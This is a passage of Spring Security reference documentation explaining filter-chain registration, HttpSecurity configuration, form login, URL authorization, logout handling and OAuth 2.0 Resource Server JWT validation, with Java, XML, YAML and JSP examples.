https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#getUserPrincipal()[HttpServletRequest#getUserPrincipal()]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#isUserInRole(java.lang.String)[HttpServletRequest#isUserInRole(java.lang.String)]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#login(java.lang.String,%20java.lang.String)[HttpServletRequest#login(java.lang.String, java.lang.String)]\n** https:\/\/docs.oracle.com\/javaee\/6\/api\/javax\/servlet\/http\/HttpServletRequest.html#logout()[HttpServletRequest#logout()]\n\n=== AbstractSecurityWebApplicationInitializer\n\nThe next step is to register the `springSecurityFilterChain` with the war.\nThis can be done in Java Configuration with https:\/\/docs.spring.io\/spring\/docs\/3.2.x\/spring-framework-reference\/html\/mvc.html#mvc-container-config[Spring's WebApplicationInitializer support] in a Servlet 3.0+ environment.\nNot suprisingly, Spring Security provides a base class `AbstractSecurityWebApplicationInitializer` that will ensure the `springSecurityFilterChain` gets registered for you.\nThe way in which we use `AbstractSecurityWebApplicationInitializer` differs depending on if we are already using Spring or if Spring Security is the only Spring component in our application.\n\n* <<abstractsecuritywebapplicationinitializer-without-existing-spring>> - Use these instructions if you are not using Spring already\n* <<abstractsecuritywebapplicationinitializer-with-spring-mvc>> - Use these instructions if you are already using Spring\n\n=== AbstractSecurityWebApplicationInitializer without Existing Spring\n\nIf you are not using Spring or Spring MVC, you will need to pass in the `WebSecurityConfig` into the superclass to ensure the configuration is picked up.\nYou can find an example below:\n\n[source,java]\n----\nimport org.springframework.security.web.context.*;\n\npublic class SecurityWebApplicationInitializer\n\textends AbstractSecurityWebApplicationInitializer {\n\n\tpublic SecurityWebApplicationInitializer() {\n\t\tsuper(WebSecurityConfig.class);\n\t}\n}\n----\n\nThe `SecurityWebApplicationInitializer` will do the following things:\n\n* Automatically register the springSecurityFilterChain Filter for every URL in your application\n* Add a ContextLoaderListener that loads the <<jc-hello-wsca,WebSecurityConfig>>.\n\n=== AbstractSecurityWebApplicationInitializer with Spring MVC\n\nIf we were using Spring elsewhere in our application we probably already had a `WebApplicationInitializer` that is loading our Spring Configuration.\nIf we use the previous configuration we would get an error.\nInstead, we should register Spring Security with the existing `ApplicationContext`.\nFor example, if we were using Spring MVC our `SecurityWebApplicationInitializer` would look something like the following:\n\n[source,java]\n----\nimport org.springframework.security.web.context.*;\n\npublic class SecurityWebApplicationInitializer\n\textends AbstractSecurityWebApplicationInitializer {\n\n}\n----\n\nThis would simply only register the springSecurityFilterChain Filter for every URL in your application.\nAfter that we would ensure that `WebSecurityConfig` was loaded in our existing ApplicationInitializer.\nFor example, if we were using Spring MVC it would be added in the `getRootConfigClasses()`\n\n[[message-web-application-inititializer-java]]\n[source,java]\n----\npublic class MvcWebApplicationInitializer extends\n\t\tAbstractAnnotationConfigDispatcherServletInitializer {\n\n\t@Override\n\tprotected Class<?>[] getRootConfigClasses() {\n\t\treturn new Class[] { WebSecurityConfig.class };\n\t}\n\n\t\/\/ ... other overrides ...\n}\n----\n\n[[jc-httpsecurity]]\n== HttpSecurity\n\nThus far our <<jc-hello-wsca,WebSecurityConfig>> only contains information about how to authenticate our users.\nHow does Spring Security know that we want to require all users to be authenticated?\nHow does Spring Security know we want to support form based authentication?\nActually, there is an configuration class that is being invoked behind the scenes called `WebSecurityConfigurerAdapter`.\nIt has a method called `configure` with the following default implementation:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t authorizeRequests\n\t\t\t .anyRequest().authenticated()\n\t\t)\n\t\t.formLogin(withDefaults())\n\t\t.httpBasic(withDefaults());\n}\n----\n\nThe default configuration above:\n\n* Ensures that any request to our application requires the user to be authenticated\n* Allows users to authenticate with form based login\n* Allows users to authenticate with HTTP Basic authentication\n\nYou will notice that this configuration is quite similar the XML Namespace configuration:\n\n[source,xml]\n----\n<http>\n\t<intercept-url pattern=\"\/**\" access=\"authenticated\"\/>\n\t<form-login \/>\n\t<http-basic \/>\n<\/http>\n----\n\n[[jc-form]]\n== Java Configuration and Form Login\nYou might be wondering where the login form came from when you were prompted to log in, since we made no mention of any HTML files or JSPs.\nSince Spring Security's default configuration does not explicitly set a URL for the login page, Spring Security generates one automatically, based on the features that are enabled and using standard values for the URL which processes the submitted login, the default target URL the user will be sent to after logging in and so on.\n\nWhile the automatically generated log in page is convenient to get up and running quickly, most applications will want to provide their own login page.\nWhen we want to change the default configuration, we can customize the `WebSecurityConfigurerAdapter` that we mentioned earlier by extending it like so:\n\n[source,java]\n----\npublic class WebSecurityConfig extends WebSecurityConfigurerAdapter {\n\t\/\/ ...\n}\n----\n\nAnd then override the `configure` method as seen below:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t authorizeRequests\n\t\t\t .anyRequest().authenticated()\n\t\t)\n\t\t.formLogin(formLogin ->\n\t\t formLogin\n\t\t\t .loginPage(\"\/login\") \/\/ <1>\n\t\t\t .permitAll() \/\/ <2>\n\t );\n}\n----\n\n<1> The updated configuration specifies the location of the log in page.\n<2> We must grant all users (i.e. unauthenticated users) access to our log in page.\nThe `formLogin().permitAll()` method allows granting access to all users for all URLs associated with form based log in.\n\nAn example log in page implemented with JSPs for our current configuration can be seen below:\n\nNOTE: The login page below represents our current configuration.\nWe could easily update our configuration if some of the defaults do not meet our needs.\n\n[source,html]\n----\n<c:url value=\"\/login\" var=\"loginUrl\"\/>\n<form action=\"${loginUrl}\" method=\"post\"> <1>\n\t<c:if test=\"${param.error != null}\"> <2>\n\t\t<p>\n\t\t\tInvalid username and password.\n\t\t<\/p>\n\t<\/c:if>\n\t<c:if test=\"${param.logout != null}\"> <3>\n\t\t<p>\n\t\t\tYou have been logged out.\n\t\t<\/p>\n\t<\/c:if>\n\t<p>\n\t\t<label for=\"username\">Username<\/label>\n\t\t<input type=\"text\" id=\"username\" name=\"username\"\/>\t<4>\n\t<\/p>\n\t<p>\n\t\t<label for=\"password\">Password<\/label>\n\t\t<input type=\"password\" id=\"password\" name=\"password\"\/>\t<5>\n\t<\/p>\n\t<input type=\"hidden\" <6>\n\t\tname=\"${_csrf.parameterName}\"\n\t\tvalue=\"${_csrf.token}\"\/>\n\t<button type=\"submit\" class=\"btn\">Log in<\/button>\n<\/form>\n----\n\n<1> A POST to the `\/login` URL will attempt to authenticate the user\n<2> If the query parameter `error` exists, authentication was attempted and failed\n<3> If the query parameter `logout` exists, the user was successfully logged out\n<4> The username must be present as the HTTP parameter named __username__\n<5> The password must be present as the HTTP parameter named __password__\n<6> We must <<csrf-include-csrf-token>> To learn more read the <<csrf>> section of the reference\n\n[[jc-authorize-requests]]\n== Authorize Requests\nOur examples have only required users to be authenticated and have done so for every URL in our application.\nWe can specify custom requirements for our URLs by adding multiple children to our `http.authorizeRequests()` method.\nFor example:\n\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests -> \/\/ <1>\n\t\t authorizeRequests\n\t\t\t .antMatchers(\"\/resources\/**\", \"\/signup\", \"\/about\").permitAll() \/\/ <2>\n\t\t\t .antMatchers(\"\/admin\/**\").hasRole(\"ADMIN\") \/\/ <3>\n\t\t\t .antMatchers(\"\/db\/**\").access(\"hasRole('ADMIN') and hasRole('DBA')\") \/\/ <4>\n\t\t\t .anyRequest().authenticated() \/\/ <5>\n\t\t)\n\t\t.formLogin(withDefaults());\n}\n----\n\n<1> There are multiple children to the `http.authorizeRequests()` method each matcher is considered in the order they were declared.\n<2> We specified multiple URL patterns that any user can access.\nSpecifically, any user can access a request if the URL starts with \"\/resources\/\", equals \"\/signup\", or equals \"\/about\".\n<3> Any URL that starts with \"\/admin\/\" will be restricted to users who have the role \"ROLE_ADMIN\".\nYou will notice that since we are invoking the `hasRole` method we do not need to specify the \"ROLE_\" prefix.\n<4> Any URL that starts with \"\/db\/\" requires the user to have both \"ROLE_ADMIN\" and \"ROLE_DBA\".\nYou will notice that since we are using the `hasRole` expression we do not need to specify the \"ROLE_\" prefix.\n<5> Any URL that has not already been matched on only requires that the user be authenticated\n\n[[jc-logout]]\n== Handling Logouts\n\nWhen using the `{security-api-url}org\/springframework\/security\/config\/annotation\/web\/configuration\/WebSecurityConfigurerAdapter.html[WebSecurityConfigurerAdapter]`, logout capabilities are automatically applied.\nThe default is that accessing the URL `\/logout` will log the user out by:\n\n- Invalidating the HTTP Session\n- Cleaning up any RememberMe authentication that was configured\n- Clearing the `SecurityContextHolder`\n- Redirect to `\/login?logout`\n\nSimilar to configuring login capabilities, however, you also have various options to further customize your logout requirements:\n\n[source,java]\n----\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.logout(logout -> \/\/ <1>\n\t\t logout\n\t\t\t .logoutUrl(\"\/my\/logout\") \/\/ <2>\n\t\t\t .logoutSuccessUrl(\"\/my\/index\") \/\/ <3>\n\t\t\t .logoutSuccessHandler(logoutSuccessHandler) \/\/ <4>\n\t\t\t .invalidateHttpSession(true) \/\/ <5>\n\t\t\t .addLogoutHandler(logoutHandler) \/\/ <6>\n\t\t\t .deleteCookies(cookieNamesToClear) \/\/ <7>\n\t\t)\n\t\t...\n}\n----\n\n<1> Provides logout support.\nThis is automatically applied when using `WebSecurityConfigurerAdapter`.\n<2> The URL that triggers log out to occur (default is `\/logout`).\nIf CSRF protection is enabled (default), then the request must also be a POST.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutUrl-java.lang.String-[JavaDoc].\n<3> The URL to redirect to after logout has occurred.\nThe default is `\/login?logout`.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutSuccessUrl-java.lang.String-[JavaDoc].\n<4> Let's you specify a custom `LogoutSuccessHandler`.\nIf this is specified, `logoutSuccessUrl()` is ignored.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#logoutSuccessHandler-org.springframework.security.web.authentication.logout.LogoutSuccessHandler-[JavaDoc].\n<5> Specify whether to invalidate the `HttpSession` at the time of logout.\nThis is *true* by default.\nConfigures the `SecurityContextLogoutHandler` under the covers.\nFor more information, please consult the {security-api-url}org\/springframework\/security\/config\/annotation\/web\/configurers\/LogoutConfigurer.html#invalidateHttpSession-boolean-[JavaDoc].\n<6> Adds a `LogoutHandler`.\n`SecurityContextLogoutHandler` is added as the last `LogoutHandler` by default.\n<7> Allows specifying the names of cookies to be removed on logout success.\nThis is a shortcut for adding a `CookieClearingLogoutHandler` explicitly.\n\n[NOTE]\n===\nLogouts can of course also be configured using the XML Namespace notation.\nPlease see the documentation for the <<nsa-logout, logout element>> in the Spring Security XML Namespace section for further details.\n===\n\nGenerally, in order to customize logout functionality, you can add\n`{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutHandler.html[LogoutHandler]`\nand\/or\n`{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutSuccessHandler.html[LogoutSuccessHandler]`\nimplementations.\nFor many common scenarios, these handlers are applied under the\ncovers when using the fluent API.\n\n[[jc-logout-handler]]\n=== LogoutHandler\n\nGenerally, `{security-api-url}org\/springframework\/security\/web\/authentication\/logout\/LogoutHandler.html[LogoutHandler]`\nimplementations indicate classes that are able to participate in logout handling.\nThey are expected to be invoked to perform necessary clean-up.\nAs such they should\nnot throw exceptions.\nVarious implementations are provided:\n\n- {security-api-url}org\/springframework\/security\/web\/authentication\/rememberme\/PersistentTokenBasedRememberMeServices.html[PersistentTokenBasedRememberMeServices]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/rememberme\/TokenBasedRememberMeServices.html[TokenBasedRememberMeServices]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/CookieClearingLogoutHandler.html[CookieClearingLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/csrf\/CsrfLogoutHandler.html[CsrfLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/SecurityContextLogoutHandler.html[SecurityContextLogoutHandler]\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/HeaderWriterLogoutHandler.html[HeaderWriterLogoutHandler]\n\nPlease see <<remember-me-impls>> for details.\n\nInstead of providing `LogoutHandler` implementations directly, the fluent API also provides shortcuts that provide the respective `LogoutHandler` implementations under the covers.\nE.g. `deleteCookies()` allows specifying the names of one or more cookies to be removed on logout success.\nThis is a shortcut compared to adding a `CookieClearingLogoutHandler`.\n\n[[jc-logout-success-handler]]\n=== LogoutSuccessHandler\n\nThe `LogoutSuccessHandler` is called after a successful logout by the `LogoutFilter`, to handle e.g.\nredirection or forwarding to the appropriate destination.\nNote that the interface is almost the same as the `LogoutHandler` but may raise an exception.\n\nThe following implementations are provided:\n\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/SimpleUrlLogoutSuccessHandler.html[SimpleUrlLogoutSuccessHandler]\n- HttpStatusReturningLogoutSuccessHandler\n\nAs mentioned above, you don't need to specify the `SimpleUrlLogoutSuccessHandler` directly.\nInstead, the fluent API provides a shortcut by setting the `logoutSuccessUrl()`.\nThis will setup the `SimpleUrlLogoutSuccessHandler` under the covers.\nThe provided URL will be redirected to after a logout has occurred.\nThe default is `\/login?logout`.\n\nThe `HttpStatusReturningLogoutSuccessHandler` can be interesting in REST API type scenarios.\nInstead of redirecting to a URL upon the successful logout, this `LogoutSuccessHandler` allows you to provide a plain HTTP status code to be returned.\nIf not configured a status code 200 will be returned by default.\n\n[[jc-logout-references]]\n=== Further Logout-Related References\n\n- <<ns-logout, Logout Handling>>\n- <<test-logout, Testing Logout>>\n- <<servletapi-logout, HttpServletRequest.logout()>>\n- <<remember-me-impls>>\n- <<csrf-logout, Logging Out>> in section CSRF Caveats\n- Section <<cas-singlelogout, Single Logout>> (CAS protocol)\n- Documentation for the <<nsa-logout, logout element>> in the Spring Security XML Namespace section\n\n\ninclude::oauth2-client.adoc[]\n\ninclude::oauth2-login.adoc[]\n\n\n[[oauth2resourceserver]]\n== OAuth 2.0 Resource Server\n\nSpring Security supports protecting endpoints using https:\/\/tools.ietf.org\/html\/rfc7519[JWT]-encoded OAuth 2.0 https:\/\/tools.ietf.org\/html\/rfc6750.html[Bearer Tokens].\n\nThis is handy in circumstances where an application has federated its authority management out to an https:\/\/tools.ietf.org\/html\/rfc6749[authorization server] (for example, Okta or Ping Identity).\nThis authorization server can be consulted by Resource Servers to validate authority when serving requests.\n\n[NOTE]\n====\nA complete working example can be found in {gh-samples-url}\/boot\/oauth2resourceserver[*OAuth 2.0 Resource Server Servlet sample*].\n====\n\n=== Dependencies\n\nMost Resource Server support is collected into `spring-security-oauth2-resource-server`.\nHowever, the support for decoding and verifying JWTs is in `spring-security-oauth2-jose`, meaning that both are necessary in order to have a working resource server that supports JWT-encoded Bearer Tokens.\n\n[[oauth2resourceserver-minimalconfiguration]]\n=== Minimal Configuration\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the location of the authorization server.\n\n==== Specifying the Authorization Server\n\nTo specify which authorization server to use, simply do:\n\n```yaml\nsecurity:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\n```\n\nWhere `https:\/\/idp.example.com` is the value contained in the `iss` claim for JWT tokens that the authorization server will issue.\nResource Server will use this property to further self-configure, discover the authorization server's public keys, and subsequently validate incoming JWTs.\n\n[NOTE]\nTo use the `issuer-uri` property, it must also be true that `https:\/\/idp.example.com\/.well-known\/openid-configuration` is a supported endpoint for the authorization server.\nThis endpoint is referred to as a https:\/\/openid.net\/specs\/openid-connect-discovery-1_0.html#ProviderConfig[Provider Configuration] endpoint.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate JWT-encoded Bearer Tokens.\n\nIt achieves this through a deterministic startup process:\n\n1. Hit the Provider Configuration endpoint, `https:\/\/idp.example.com\/.well-known\/openid-configuration`, processing the response for the `jwks_url` property\n2. Configure the validation strategy to query `jwks_url` for valid public keys\n3. Configure the validation strategy to validate each JWTs `iss` claim against `https:\/\/idp.example.com`.\n\nA consequence of this process is that the authorization server must be up and receiving requests in order for Resource Server to successfully start up.\n\n[NOTE]\nIf the authorization server is down when Resource Server queries it (given appropriate timeouts), then startup will fail.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n```http\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n```\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven a well-formed JWT token, Resource Server will\n\n1. Validate its signature against a public key obtained from the `jwks_url` endpoint during startup and matched against the JWTs header\n2. Validate the JWTs `exp` and `nbf` timestamps and the JWTs `iss` claim, and\n3. Map each scope to an authority with the prefix `SCOPE_`.\n\n[NOTE]\nAs the authorization server makes available new keys, Spring Security will automatically rotate the keys used to validate the JWT tokens.\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `Jwt` object, and `Authentication#getName` maps to the JWT's `sub` property, if one is present.\n\nFrom here, consider jumping to:\n\n<<oauth2resourceserver-jwkseturi,How to Configure without Tying Resource Server startup to an authorization server's availability>>\n\n<<oauth2resourceserver-sansboot,How to Configure without Spring Boot>>\n\n[[oauth2resourceserver-jwkseturi]]\n=== Specifying the Authorization Server JWK Set Uri Directly\n\nIf the authorization server doesn't support the Provider Configuration endpoint, or if Resource Server must be able to start up independently from the authorization server, then `issuer-uri` can be exchanged for `jwk-set-uri`:\n\n```yaml\nsecurity:\n oauth2:\n resourceserver:\n jwt:\n jwk-set-uri: https:\/\/idp.example.com\/.well-known\/jwks.json\n```\n\n[NOTE]\nThe JWK Set uri is not standardized, but can typically be found in the authorization server's documentation\n\nConsequently, Resource Server will not ping the authorization server at startup.\nHowever, it will also no longer validate the `iss` claim in the JWT (since Resource Server no longer knows what the issuer value should be).\n\n[NOTE]\nThis property can also be supplied directly on the <<oauth2resourceserver-jwkseturi-dsl,DSL>>.\n\n[[oauth2resourceserver-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server:\n\n```java\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(withDefaults())\n );\n}\n```\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n```java\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwtAuthenticationConverter(myConverter())\n )\n );\n }\n}\n```\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is a `JwtDecoder`, which decodes `String` tokens into validated instances of `Jwt`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return JwtDecoders.fromOidcIssuerLocation(issuerUri);\n}\n```\n\nIf the application doesn't expose a `JwtDecoder` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `jwkSetUri()` or replaced using `decoder()`.\n\n[[oauth2resourceserver-jwkseturi-dsl]]\n==== Using `jwkSetUri()`\n\nAn authorization server's JWK Set Uri can be configured <<oauth2resourceserver-jwkseturi,as a configuration property>> or it can be supplied in the DSL:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwkSetUri(\"https:\/\/idp.example.com\/.well-known\/jwks.json\")\n )\n );\n }\n}\n```\n\nUsing `jwkSetUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-decoder-dsl]]\n==== Using `decoder()`\n\nMore powerful than `jwkSetUri()` is `decoder()`, which will completely replace any Boot auto configuration of `JwtDecoder`:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .decoder(myCustomDecoder())\n )\n );\n }\n}\n```\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-validation,validation>>, <<oauth2resourceserver-claimsetmapping,mapping>>, or <<oauth2resourceserver-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-decoder-bean]]\n==== Exposing a `JwtDecoder` `@Bean`\n\nOr, exposing a `JwtDecoder` `@Bean` has the same effect as `decoder()`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n}\n```\n\n[[oauth2resourceserver-authorization]]\n=== Configuring Authorization\n\nA JWT that is issued from an OAuth 2.0 Authorization Server will typically either have a `scope` or `scp` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from a JWT, the corresponding expressions should include this prefix:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(withDefaults())\n );\n }\n}\n```\n\nOr similarly with method security:\n\n```java\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) {}\n```\n\n[[oauth2resourceserver-authorization-extraction]]\n==== Extracting Authorities Manually\n\nHowever, there are a number of circumstances where this default is insufficient.\nFor example, some authorization servers don't use the `scope` attribute, but instead have their own custom attribute.\nOr, at other times, the resource server may need to adapt the attribute or a composition of attributes into internalized authorities.\n\nTo this end, the DSL exposes `jwtAuthenticationConverter()`:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwtAuthenticationConverter(grantedAuthoritiesExtractor())\n )\n );\n }\n}\n\nConverter<Jwt, AbstractAuthenticationToken> grantedAuthoritiesExtractor() {\n JwtAuthenticationConverter jwtAuthenticationConverter =\n new JwtAuthenticationConverter();\n jwtAuthenticationConverter.setJwtGrantedAuthoritiesConverter\n (new GrantedAuthoritiesExtractor());\n return jwtAuthenticationConveter;\n}\n```\n\nwhich is responsible for converting a `Jwt` into an `Authentication`.\nAs part of its configuration, we can supply a subsidiary converter to go from `Jwt` to a `Collection` of `GrantedAuthority`s.\n\nThat final converter might be something like `GrantedAuthoritiesExtractor` below:\n\n```java\nstatic class GrantedAuthoritiesExtractor\n implements Converter<Jwt, Collection<GrantedAuthority>> {\n\n public Collection<GrantedAuthority> convert(Jwt jwt) {\n Collection<String> authorities = (Collection<String>)\n jwt.getClaims().get(\"mycustomclaim\");\n\n return authorities.stream()\n .map(SimpleGrantedAuthority::new)\n .collect(Collectors.toList());\n }\n}\n```\n\nFor more flexibility, the DSL supports entirely replacing the converter with any class that implements `Converter<Jwt, AbstractAuthenticationToken>`:\n\n```java\nstatic class CustomAuthenticationConverter implements Converter<Jwt, AbstractAuthenticationToken> {\n public AbstractAuthenticationToken convert(Jwt jwt) {\n return new CustomAuthenticationToken(jwt);\n }\n}\n```\n\n[[oauth2resourceserver-validation]]\n=== Configuring Validation\n\nUsing <<oauth2resourceserver-minimalconfiguration,minimal Spring Boot configuration>>, indicating the authorization server's issuer uri, Resource Server will default to verifying the `iss` claim as well as the `exp` and `nbf` timestamp claims.\n\nIn circumstances where validation needs to be customized, Resource Server ships with two standard validators and also accepts custom `OAuth2TokenValidator` instances.\n\n[[oauth2resourceserver-validation-clockskew]]\n==== Customizing Timestamp Validation\n\nJWT's typically have a window of validity, with the start of the window indicated in the `nbf` claim and the end indicated in the `exp` claim.\n\nHowever, every server can experience clock drift, which can cause tokens to appear expired to one server, but not to another.\nThis can cause some implementation heartburn as the number of collaborating servers increases in a distributed system.\n\nResource Server uses `JwtTimestampValidator` to verify a token's validity window, and it can be configured with a `clockSkew` to alleviate the above problem:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromOidcIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> withClockSkew = new DelegatingOAuth2TokenValidator<>(\n new JwtTimestampValidator(Duration.ofSeconds(60)),\n new IssuerValidator(issuerUri));\n\n jwtDecoder.setJwtValidator(withClockSkew);\n\n return jwtDecoder;\n}\n```\n\n[NOTE]\nBy default, Resource Server configures a clock skew of 30 seconds.\n\n[[oauth2resourceserver-validation-custom]]\n==== Configuring a Custom Validator\n\nAdding a check for the `aud` claim is simple with the `OAuth2TokenValidator` API:\n\n```java\npublic class AudienceValidator implements OAuth2TokenValidator<Jwt> {\n OAuth2Error error = new OAuth2Error(\"invalid_token\", \"The required audience is missing\", null);\n\n public OAuth2TokenValidatorResult validate(Jwt jwt) {\n if (jwt.getAudience().contains(\"messaging\")) {\n return OAuth2TokenValidatorResult.success();\n } else {\n return OAuth2TokenValidatorResult.failure(error);\n }\n }\n}\n```\n\nThen, to add into a resource server, it's a matter of specifying the `JwtDecoder` instance:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromOidcIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> audienceValidator = new AudienceValidator();\n OAuth2TokenValidator<Jwt> withIssuer = JwtValidators.createDefaultWithIssuer(issuerUri);\n OAuth2TokenValidator<Jwt> withAudience = new DelegatingOAuth2TokenValidator<>(withIssuer, audienceValidator);\n\n jwtDecoder.setJwtValidator(withAudience);\n\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-claimsetmapping]]\n=== Configuring Claim Set Mapping\n\nSpring Security uses the https:\/\/bitbucket.org\/connect2id\/nimbus-jose-jwt\/wiki\/Home[Nimbus] library for parsing JWTs and validating their signatures.\nConsequently, Spring Security is subject to Nimbus's interpretation of each field value and how to coerce each into a Java type.\n\nFor example, because Nimbus remains Java 7 compatible, it doesn't use `Instant` to represent timestamp fields.\n\nAnd it's entirely possible to use a different library or for JWT processing, which may make its own coercion decisions that need adjustment.\n\nOr, quite simply, a resource server may want to add or remove claims from a JWT for domain-specific reasons.\n\nFor these purposes, Resource Server supports mapping the JWT claim set with `MappedJwtClaimSetConverter`.\n\n[[oauth2resourceserver-claimsetmapping-singleclaim]]\n==== Customizing the Conversion of a Single Claim\n\nBy default, `MappedJwtClaimSetConverter` will attempt to coerce claims into the following types:\n\n|============\n| Claim | Java Type\n| `aud` | `Collection<String>`\n| `exp` | `Instant`\n| `iat` | `Instant`\n| `iss` | `String`\n| `jti` | `String`\n| `nbf` | `Instant`\n| `sub` | `String`\n|============\n\nAn individual claim's conversion strategy can be configured using `MappedJwtClaimSetConverter.withDefaults`:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n\n MappedJwtClaimSetConverter converter = MappedJwtClaimSetConverter\n .withDefaults(Collections.singletonMap(\"sub\", this::lookupUserIdBySub));\n jwtDecoder.setClaimSetConverter(converter);\n\n return jwtDecoder;\n}\n```\nThis will keep all the defaults, except it will override the default claim converter for `sub`.\n\n[[oauth2resourceserver-claimsetmapping-add]]\n==== Adding a Claim\n\n`MappedJwtClaimSetConverter` can also be used to add a custom claim, for example, to adapt to an existing system:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"custom\", custom -> \"value\"));\n```\n\n[[oauth2resourceserver-claimsetmapping-remove]]\n==== Removing a Claim\n\nAnd removing a claim is also simple, using the same API:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"legacyclaim\", legacy -> 